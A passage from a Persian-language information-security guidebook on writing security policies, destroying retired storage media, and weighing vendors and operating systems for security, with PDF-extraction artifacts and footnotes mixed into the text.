ﺩﺭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ،ﻛﺎﺭﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻛﻮﭼﻜﺘﺮ ﻣﺜﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﻳﻚ ﻓﺎﻳﻞ ﻫﻢ ﺑﻪ ﻣﺠﻮﺯ ﺍﻣﻀﺎﺷﺪﺓ ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ ﻧﻴﺎﺯ ﺩﺍﺭﺩ.
ﺳﻴﺎﺳﺖ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺪﺍﻧﻨﺪ ﻛﻪ ﺍﻧﺠﺎﻡ ﭼﻪ ﻛﺎﺭﻱ ﻣﺠﺎﺯ ﻭ ﺍﻧﺠﺎﻡ ﭼﻪ ﻛﺎﺭﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺳﺖ .ﺳﻴﺎﺳـﺖ ،ﻣـﺪﻳﺮﺍﻥ ﻭ ﺭﺍﻫﺒـﺮﺍﻥ ﺭﺍ ﺩﺭ
ﺗﺼﻤﻴﻤﮕﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻢ ﻭ ﻧﺤﻮﺓ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺭﺍﻫﻨﻤﺎﻳﻲ ﻣﻲﻛﻨﺪ .ﺳﻴﺎﺳﺖ ﺑﻪ ﻃﺮﺍﺣﺎﻥ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺑﺴﺎﺯﻧﺪ ﻛـﻪ ﺑـﺎ
ﻛﻤﻚ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻥ ﺑﻪ ﺍﻫﺪﺍﻑ ﺳﺎﺯﻣﺎﻥ ﺩﺳﺖ ﻳﺎﻓﺖ .ﺍﺻﻠﻲﺗﺮﻳﻦ ﺟﺰﺀ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ،ﺍﻋﻼﻡ ﺻﺮﻳﺢ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﻣﺠـﺎﺯ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ ﺑـﺮﺍﻱ
ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﺍﺳﺖ .ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻥ ﭘﺎﺳﺦ ﺳﺆﺍﻻﺕ ﺯﻳﺮ ﺭﺍ ﭘﻴﺪﺍ ﻛﺮﺩ:
ﭼﻪ ﻛﺴﻲ ﻣﺠﺎﺯ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ؟ ﻣﺎﻫﻴﺖ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﭼﻴﺴﺖ؟ ﻭ ﭼﻪ ﻛﺴﻲ ﻣﺠﻮﺯ ﺍﻳﻦ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﺍﺳﺖ؟ •
ﭼﻪ ﻛﺴﻲ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ،ﺍﺭﺗﻘﺎﻫﺎ ،ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ،ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ؟ •
ﭼﻪ ﻧﻮﻉ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻋﻤﻮﻡ ﺍﺭﺍﺋﻪ ﺷﻮﺩ؟ •
ﻛﺪﺍﻡ ﺍﺩﺍﺭﺍﺕ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﺍ ﺩﺍﺭﻧﺪ؟ •
ﭘﻴﺶ ﺍﺯ ﻧﺼﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ uploadﺻﻔﺤﺎﺕ ﻭﺏ ،ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ؟ •
ﺑﻪ ﺷﻜﺎﻳﺘﻬﺎ ﻭ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﻣﺤﺘﻮﺍﻫﺎﻱ ﺁﻥ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﺭﺳﻴﺪﮔﻲ ﻛﺮﺩ؟ •
٣٤٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺍﺳﻨﺎﺩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻜﺘﻮﺏ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺗﻤﺎﻡ ﻛﺴﺎﻧﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﺎ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ .ﺗﻮﺟﻪ ﺑﻪ ﺗـﺪﻭﻳﻦ
ﺳﻴﺎﺳﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﻜﻼﺕ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ.
ﻳﻜﻲ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ،ﺭﻭﺵ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺮﺍﻱ ﻣﻨﻬـﺪﻡ ﻛـﺮﺩﻥ ﺭﺳـﺎﻧﻪﻫـﺎﻱ
ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺍﺳﺖ .ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ،ﻧﻮﺍﺭﻫﺎﻱ ﻗﺪﻳﻤﻲ ﭘﺸﺘﻴﺒﺎﻥ ،ﻭ ﺣﺘﻲ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺣـﺎﻭﻱ
ﺩﺍﺩﻩﻫﺎﻱ ﻣﺤﺮﻣﺎﻧﻪ ﻭ ﺍﺭﺯﺷﻤﻨﺪ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﺍﻗﻼﻡ ﻧﻪﺗﻨﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺩﺭﺣﺎﻝ ﻓﻌﺎﻟﻴﺖ ﻫﺴﺘﻨﺪ ﺑﺎﻳﺪ ﺍﺯ ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻥ ﺣﻔﺎﻇـﺖ ﮔﺮﺩﻧـﺪ ،ﺑﻠﻜـﻪ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺯ ﺭﺩﻩ ﺧﺎﺭﺝ ﻣﻲﺷﻮﻧﺪ ﻧﻴﺰ ﺑﺎﻳﺪ ﺳﻴﺎﺳﺘﻲ ﻣﺸﺨﺺ ﻭ ﻛﺎﺭﺁ ﺑﺮﺍﻱ ﺍﻧﻬﺪﺍﻡ ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻧﻬﺎ ﻭﺟﻮﺩ
ﻻ ﻣﻨﻬﺪﻡ ﻛﺮﺩﻥ ﻛﺎﻣﻞ ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﺑﺴﻴﺎﺭ ﻣﺸﻜﻞ ﺍﺳﺖ. ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻣﻌﻤﻮ ﹰ
ﺍﻧﺘﺨﺎﺏ ﻓﺮﻭﺷﻨﺪﻩ
ﺍﻣﺮﻭﺯﻩ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﮔﺰﻳﻨﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺘﻬﺎﻱ ﻧﺼﺐﻛﻨﻨﺪﻩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺍﻃﻼﻋـﺎﺕ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﺁﻳـﺎ
ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Windowsﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻳﺎ ،Unix ،Mac OSﻭ ﻳﺎ ﻳﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﺁﺯﺍﺩ ﺷـﺒﻴﻪ Unix؟ ﺁﻳـﺎ ﺍﻳـﻦ
ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﻳﻚ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﺓ ﺳﺎﺯﮔﺎﺭ ﺑﺎ Intelﺭﺍ ﺑﻜﺎﺭ ﺑﺒﺮﺩ ﻳﺎ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎﻱ ،Power PC ،SPARCﻭ ﻳﺎ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ؟ ﺁﻳﺎ ﺭﺍﻳﺎﻧﺔ ﻣﻮﺭﺩ
ﻧﻈﺮ ﺑﺎﻳﺪ ﺑﺎ ﺧﺪﻣﺎﺕ ﭘﺲ ﺍﺯ ﻓﺮﻭﺵ ﺧﺮﻳﺪﺍﺭﻱ ﺷﻮﺩ ﻳﺎ ﺑﺪﻭﻥ ﺁﻥ؟ ﭼﻪ ﺳﻄﺤﻲ ﺍﺯ ﺧﺪﻣﺎﺕ ﭘﺲ ﺍﺯ ﻓﺮﻭﺵ ﺑﺮﺍﻱ ﻛﺎﺭ ﺷﻤﺎ ﻣﻨﺎﺳﺐ ﺍﺳﺖ؟
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﺼﻤﻴﻤﺎﺕ ﺧﺮﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﻋﻮﺍﻣﻠﻲ ﭼﻮﻥ ﻫﺰﻳﻨﺔ ﺳﻴﺴﺘﻢ ،ﺍﻋﺘﺒﺎﺭ ﻓﺮﻭﺷﻨﺪﻩ ﻭ ﺗﺠﺮﺑﺔ ﺷﺨﺼﻲ ﻛﻪ ﺧﺮﻳﺪ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ﺍﺗﺨـﺎﺫ
ﻣﻲﺷﻮﻧﺪ ﻭ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺧﺮﻳﺪ ﺧﻮﺩ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘ ﹺﻢ ﻣﻮﺭﺩ ﻧﻈﺮ ﺗﻨﻈﻴﻢ ﻣﻲﻛﻨﻨﺪ.
ﺑﻌﻀﻲ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻭ ﺑﺮﺧﻲ ﺍﺯ ﺑﺴﺘﺮﻫﺎ ﺫﺍﺗﹰﺎ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮﻱ ﻧﺴﺒﺖ ﺑﻪ ﻣﺎﺑﻘﻲ ﺩﺍﺭﻧﺪ ،ﭼﺮﺍﻛﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻣﺨﺘﻠﻒ ،ﺑﺮﺍﻱ ﻛﻴﻔﻴﺖ ﺑﺮﻧﺎﻣـﻪ
ﻭ ﺍﻣﻨﻴﺖ ﺁﻥ ﺍﺭﺯﺷﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻗﺎﺋﻞ ﻫﺴﺘﻨﺪ؛ ﺍﻣﺎ ﺍﻧﺪﺍﺯﺓ ﺳﺎﺯﻣﺎﻥ ﻣﺸﺘﺮﻱ ﻫﻢ ﺑﺮ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ
ﺭﻗﺒﺎﻱ ﺳﺮﻣﺎﻳﻪﺩﺍﺭ ،ﻳﺎﻓﺘﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﻣﻨﺘﺸﺮ ﻛﻨﻨﺪ ،ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺗﺎ ﺣﺪﻭﺩﻱ ﺍﻳﻤﻦ ﻫﺴﺘﻨﺪ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺎﺍﻣﻦ ﺷﻮﻧﺪ.
ﻳﻜﻲ ﺍﺯ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﻋﻠﻴﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ،ﻭﺟﻮﺩ ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ؛ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺗﻮﻗﻒ ﻛﺎﺭ ﺳﻴﺴﺘﻢ ﺷﻮﺩ ،ﺍﻃﻼﻋﺎﺕ
ﺭﺍ ﺗﺨﺮﻳﺐ ﻛﻨﺪ ،ﻳﺎ ﺍﺯ ﻫﻤﻪ ﺑﺪﺗﺮ ،ﺍﻓﺮﺍﺩ ﺧﺎﺭﺟﻲ ﺭﺍ ﻗﺎﺩﺭ ﻛﻨﺪ ﻛﻪ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮ ﻣﺠﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺑﺪ ﻧﻴﺴﺖ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺩﺭﺻـﺪ
ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ،ﺑﺮﺍﻱ ﻋﻤﻠﻴﺎﺕ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺧﻮﺩ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺁﺯﻣﺎﻳﺸﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻳﺎ ﺣﺘﻲ ﻧﺴﺨﻪﻫﺎﻱ ﭘﻴـﺸﺘﺮ ﺍﺯ ﺁﻥ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ!
ﺍﺯ ﺁﻧﺠﺎ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ ،ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﺑـﺎ ﻳـﻚ ﺭﻳـﺰﭘﺮﺩﺍﺯﻧـﺪﺓ ﺳـﺎﺯﮔﺎﺭ ﺑـﺎ Intelﻭ ﺑـﺎ ﺳﻴـﺴﺘﻢﻋـﺎﻣﻠﻲ ﺍﺯ ﻧـﺴﻞ
Windows NTﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ،ﻣﻬﺎﺟﻤﺎﻥ ﺍﻧﮕﻴﺰﺓ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﺍﻳﻦ ﭘﻴﻜﺮﺑﻨﺪﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻧﺪ ١٩٦.ﺑﻪ ﻫﻤـﻴﻦ
ﺩﻟﻴﻞ ﺑﺮﺧﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺍﺯ ﭘﻴﻜﺮﺑﻨﺪﻳﻬﺎﻱ ﻏﻴﺮﻣﺮﺳﻮﻡ -ﻣﺜﻞ Open BSDﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ - Solaris SPARC
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ،ﺗﻨﻬﺎ ﺑﻪ ﺍﻳﻦ ﻋﻠﺖ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺴﻴﺎﺭ ﻛﻤﺘﺮﻱ ﺗﺠﺮﺑﺔ ﻛﺎﺭ ﺑﺎ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺩﺍﺭﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﺍﻭﻟﻴﻦ ﻧﮕﺮﺍﻧﻲ ﺷﻤﺎ ﺩﺭ
ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻣﺴﺎﺋﻞ ﻣﺒﺘﻼﺑﻪ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﺔ Macintoshﺑﺎ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ،OS 8 ،OS 7ﻭ ﻳﺎ OS 9ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ Macintoshﺑـﺎ ﺑﺮﻧﺎﻣـﺔ ﻣﻔـﺴﺮ
ﺧﻂ ﻓﺮﻣﺎﻥ ١٩٧ﺩﺭ ﺑﺎﺯﺍﺭ ﺗﻮﺯﻳﻊ ﻧﺸﺪﻩﺍﻧﺪ ،ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻧﻔﻮﺫ ﻛﻨﻨﺪ ﻭ ﺑﻪ ﺍﻧﺘﺨـﺎﺏ ﺧـﻮﺩ ﺑـﻪ
۱۹۶ﺩﻻﻳﻞ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺑﺮﺍﻱ ﺗﺒﺪﻳﻞﺷﺪﻥ ﻣﺤﺼﻮﻻﺕ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﻪ ﻳﻚ ﻫﺪﻑ ﺟﺬﺍﺏ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺍﺳﺖ ،ﻣﺜﻞ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﻛـﺸﻒﻧـﺸﺪﻩ،
ﭘﻴﭽﻴﺪﮔﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ ،ﻭ ﻧﻴﺰ ﺍﻳﻦ ﻭﺍﻗﻌﻴﺖ ﺳﺎﺩﻩ ﻛﻪ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺧﻮﺷﺸﺎﻥ ﻧﻤﻲﺁﻳﺪ.
197 Command-Line Interpreter
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٥٠
ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺑﭙﺮﺩﺍﺯﻧﺪ .ﺑﻌﻼﻭﻩ ﺍﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺩﻫﻬﺎ ﺳﺮﻭﻳﺲ ﺷﺒﻜﻪﺍﻱ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺑﺘـﻮﺍﻥ ﻫﺮﻳـﻚ ﺍﺯ ﺁﻧﻬـﺎ ﺭﺍ ﻣـﻮﺭﺩ ﺳـﻮﺀ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺑﻄﻮﺭ ﻛﻠﻲ ﻧﻴﺰ ﺷﺮﻛﺖ Appleﺳﺎﺑﻘﺔ ﺧﻮﺑﻲ ﺩﺭ ﺍﺭﺍﺋﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺩﻗﻴﻖ ﻭ ﺑﺪﻭﻥ ﺍﺷﻜﺎﻝ ﺩﺍﺭﺩ.
ﻫﺮﭼﻨﺪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻲ ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ،ﺍﻣﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺍﺧﺘـﺼﺎﺻﻲ ﻛـﻪ ﺑـﺮﺍﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻧﻴﺰ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻣﻬﻢ ﻫﺴﺘﻨﺪ .ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﺳﺎﺩﻩ ﻛﻪ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﻗﺎﺑﻠﻴـﺖ ﺳﻴـﺴﺘﻢ ﻧﻮﺷـﺘﻪﺷـﺪﻩ
ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻳﻤﻦ ﺭﺍ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻛﻨﺪ.
ﺑﺮﺧﻲ ﺍﺯ ﻣﺮﺍﺣﻠﻲ ﻛﻪ ﺑﺎﻳﺪ ﭘﻴﺶ ﺍﺯ ﻃﺮﺍﺣﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺩﻧﺒﺎﻝ ﺷﻮﻧﺪ ﺑﻪ ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ:
ﺗﺤﻘﻴﻖ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﺪﺍﻡ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﻪ ﺗﻮﻟﻴﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺪﻭﻥ ﺍﺷﻜﺎﻝ ﻭ ﺧﻮﺏ ﻣـﺴﺘﻨﺪﺳﺎﺯﻱﺷـﺪﻩ ﻣﻌـﺮﻭﻑ ﻫـﺴﺘﻨﺪ .ﺑﺒﻴﻨﻴـﺪ •
ﻣﻌﻴﺎﺭﻫﺎﻱ ﻣﺸﺨﺼﻲ ﻛﻪ ﻓﺮﻭﺷﻨﺪﻩ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺳﻄﺢ ﺑﺎﻻﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻜﺎﺭ ﻣﻲﺑﺮﺩ -ﻣﺜﻞ ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺘـﻲ ،ﺗﺤﻠﻴـﻞ
ﺟﺮﻳﺎﻥ ﺩﺍﺩﻩﻫﺎ ،ﻣﻤﻴﺰﻱﻫﺎﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﻳﺎ ﺁﺯﻣﻮﻥ ﻧﻔﻮﺫ -ﻛﺪﺍﻣﻨﺪ .ﺍﺯ ﻓﺮﻭﺷﻨﺪﻩ ﺑﺨﻮﺍﻫﻴﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎ ﻭ ﺍﻗﺪﺍﻣﺎﺕ ﺧﻮﺩ ﺭﺍ
ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻗﺮﺍﺭ ﺩﻫﺪ .ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﺑﻪ ﺭﻭﺍﻟﻬﺎﻱ ﻗﺒﻠﻲ ﺁﻥ ﻓﺮﻭﺷﻨﺪﻩ ﺑﺮﺍﻱ ﻛﺸﻒ ﻭ ﮔﺰﺍﺭﺵ ﺍﺷـﻜﺎﻻﺕ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﺶ ﺗﻮﺟﻪ ﻛﻨﻴﺪ .ﻳﻚ ﻣﻨﺒﻊ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈـﻮﺭ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺩﺭ ﺁﺩﺭﺱ http://www.securityfocus.com
ﭘﻴﺪﺍ ﻛﺮﺩ) .ﺑﺪﻟﻴﻞ ﺗﻜﺎﻣﻞ ﺭﻭﺷﻬﺎﻱ ﭘﺬﻳﺮﻓﺘﻪﺷﺪﻩ ﺩﺭ ﻛﺸﻒ ﻭ ﮔﺰﺍﺭﺵ ﻧﻘﺎﻳﺺ ،ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷﻮﺩ ﺍﺯ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻗﺒﻞ ﺍﺯ ﺳـﺎﻝ ۱۹۹۷ﻫـﺴﺘﻨﺪ ﺩﺭ
